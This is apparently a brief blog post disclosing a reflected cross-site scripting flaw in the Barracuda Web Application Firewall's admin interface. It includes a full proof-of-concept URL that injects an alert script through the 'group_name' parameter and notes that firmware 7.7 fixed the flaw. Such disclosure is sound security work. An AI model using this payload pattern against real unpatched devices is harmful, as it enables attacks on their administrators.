Unfortunately this one is a bit late, but at the end of 2012 I came across a reflected XSS vulnerability within the Barracuda Web Application Firewall device.
This can be triggered by manipulating the ‘group_name’ URL parameter as follows:
http://192.168.0.31:8000/cgi-mod/index.cgi?&user=XXXXXXXXXXX&password=XXXXXXXXXXXXXXXXXX&et=XXXXXXXXX&auth_type=Local&locale=en_US&primary_tab=ADVANCED&secondary_tab=advanced_ip_config&group_name=%22%20style=%22xss:expression(alert(‘Cross Site Scripting on the WAF web interface !!!!!’))
Which results in the following:
A firmware patch was released (Version 7.7) to address this issue.
I would like to thank Barracuda for their good communication and turn around in resolving this vulnerability.